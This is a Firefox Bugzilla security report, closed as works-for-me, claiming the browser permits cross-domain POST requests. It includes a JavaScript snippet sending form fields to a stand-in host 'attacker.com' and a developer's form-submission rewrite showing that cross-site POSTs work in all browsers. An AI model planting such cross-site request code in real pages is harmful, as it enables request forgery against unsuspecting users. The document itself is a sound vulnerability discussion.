Closed
Bug 573003
Opened 14 years ago
Closed 14 years ago
Firefox allows cross-domain POST requests via JavaScript
Categories
(Firefox :: Security, defect)
Tracking
()
RESOLVED
WORKSFORME
People
(Reporter: tkonrad, Unassigned)
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 Firefox allows the submission of arbitrary POST requests domains different from the originating one. This makes it a lot easier to mount Cross-Site Request Forgery attacks. Imagine one of the following situations where a JavaScript, which performs a malicious action on a different site (such as posting something on Facebook), is embedded into a site: - A malicious web site administrator embeds a malicious JavaScript into his site. - An attacker can embed arbitrary JavaScript into a frequently visited site (such as via a Cross-Site Scripting vulnerability) Other browsers don't allow for cross-domain POST requests (i tested IE 8, Opera 10.53 and Chrome 5). Reproducible: Always Steps to Reproduce: The following script demonstrates the issue (embed it into a site different from attacker.com): <script language="javascript"> var fields = {'a' : 'b'}; postToUrl('http://attacker.com', fields); function postToUrl(url, fields) { var http; try { var http = new ActiveXObject('Microsoft.XMLHTTP'); } catch(e) { var http = new XMLHttpRequest(); } var params = ''; for (var key in fields) params += key + '=' + fields[key] + '&'; http.open('POST', url, true); http.send(params); } </script> Actual Results: The POST request is sent. Expected Results: The POST request to domains different from the originating one should be denied.
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago
Resolution: --- → DUPLICATE
Comment 2•14 years ago
|
||
I don't believe this is a duplicate of bug 246476, we should not be allowing cross-domain XHR without a CORS response from the host. But I'm a little confused by the example. CSRF posts would be pointing at a victim site, in which case we should be blocking it. The code points the post at "attacker.com" which presumably would implement the CORS headers, but then it's not a CSRF attack. Of course malicious script can just create a form in the document DOM and submit it and bypass any cross-site XHR restrictions. If that's what you're talking about then this is a dupe of bug 246476, but then it should work identically in all major browsers.
Status: RESOLVED → UNCONFIRMED
Resolution: DUPLICATE → ---
Indeed, the code above can be rewritten as: inp = document.createElement("input"); form = document.createElement("form"); form.appendChild(inp); inp.name = params; form.action = url; form.method = "POST"; document.body.appendChild(form); form.submit(); that will work in all browsers. If I'm misunderstanding something, please reopen the bug. We definitely want to fix this if there really is a problem here, but I'd prefer not to have security bugs just laying around.
Status: UNCONFIRMED → RESOLVED
Closed: 14 years ago → 14 years ago
Resolution: --- → WORKSFORME
You need to log in
before you can comment on or make changes to this bug.
Description
•